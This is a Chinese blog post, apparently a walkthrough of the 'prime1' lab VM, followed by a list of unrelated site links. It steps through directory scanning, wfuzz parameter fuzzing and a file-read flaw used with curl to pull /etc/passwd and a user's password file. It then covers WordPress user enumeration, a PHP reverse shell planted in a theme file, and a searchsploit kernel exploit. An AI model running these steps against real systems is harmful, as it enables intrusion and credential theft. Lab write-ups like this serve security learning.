prime1

yang-ace / 2024-04-29 / 原文

prime1

主机发现

发现服务、得到80 http、22 ssh

有登录框就SQL注入、密码爆破
无登录框就目录扫描

目录扫描：drib dirsearch 御剑 dirbuster(kali终端输入，启动图形化界面) burpsuite

普通扫描

dirb http://192.168.218.146/

得到

http://192.168.218.146/dev
http://192.168.218.146/index.php
http://192.168.218.146/wordpress

指定扫描

-X指定后缀扫描

dirb http://192.168.218.146/ -X .txt,.php,.zip

得到

http://192.168.218.146/image.php                                 http://192.168.218.146/index.php                               http://192.168.218.146/secret.txt

挨个进入发现secret.txt

提示使用fuzz工具，看到location.txt会知道怎么做

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.218.146/index.php?FUZZ

过滤12个word结果

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12  http://192.168.218.146?FUZZ=wuya

得到提示file，根据上一步提示文件location.txt

提示使用secrettier360参数在其他php页面进行挖掘信息，访问

curl http://192.168.218.146/image.php?secrettier360=/etc/passwd

结合刚才发现的读取文件漏洞，构造

curl http://192.168.218.146/image.php?secrettier360=/home/saket/password.txt

现在有密码，通过wpsan扫描用户名

wpscan --url http://192.168.218.146/wordpress/ --enumerate u

利用漏洞进行代码上传

生成php反弹shell

在网站写入shell

启动msfconsole

run然后访问

wordpress/wp-content/themes/twentynineteen/secret.php

提权
查看版本

使用msf查找

searchsploit 16.04 Ubuntu

先将文件拷贝到root下

我的kali版本太高,所以使用靶机进行编译

将文件上传到/tmp

prime1更多相关文章

今日报告-66

设置Windows10暂停更新3000天

AQS公平锁的流程

AMD锐龙7 7800X3D网游专项测试：竟比i9-13900KS强了15%

常用总线技术基本参数对比

探索图像数据中的隐藏信息：语义实体识别和关系抽取的奇妙之旅

设置Chrome浏览器自动升级

JavaScript – 小技巧 Tips

postgresql在插入数据后怎么获取自增id

EF Core 的基本使用

error: failed to push some refs to 'https://github.com/*******/********.github.io.git'

欧拉降幂

编程语言能力对比

基于机器视觉的小车轨迹控制软件界面展示

随机推荐

划水

命令拼接技巧

Fiddler抓包Android7以内版本

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

prime1

prime1

prime1更多相关文章

随机推荐

热门话题